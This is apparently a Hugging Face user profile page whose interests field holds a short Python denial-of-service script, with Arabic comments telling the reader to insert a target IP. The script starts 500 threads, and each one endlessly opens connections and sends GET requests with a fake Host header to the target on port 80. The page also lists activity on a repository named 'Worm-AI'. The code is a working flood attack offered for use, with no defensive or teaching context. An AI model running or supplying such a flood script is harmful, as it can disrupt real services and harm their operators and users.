ZiadHamada
ZiadHamada
AI & ML interests
import socket
import threading
target = '127.0.0.1' # حط هنا الـ IP اللي عايز تجربه
port = 80 # المنفذ
fake_ip = '182.21.20.32'
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
for i in range(500): # عدد المرات (Threads)
thread = threading.Thread(target=attack)
thread.start()
Recent Activity
new activity
about 1 month ago
huggingface/InferenceSupport:ZiadHamada/Worm-AI Organizations
None yet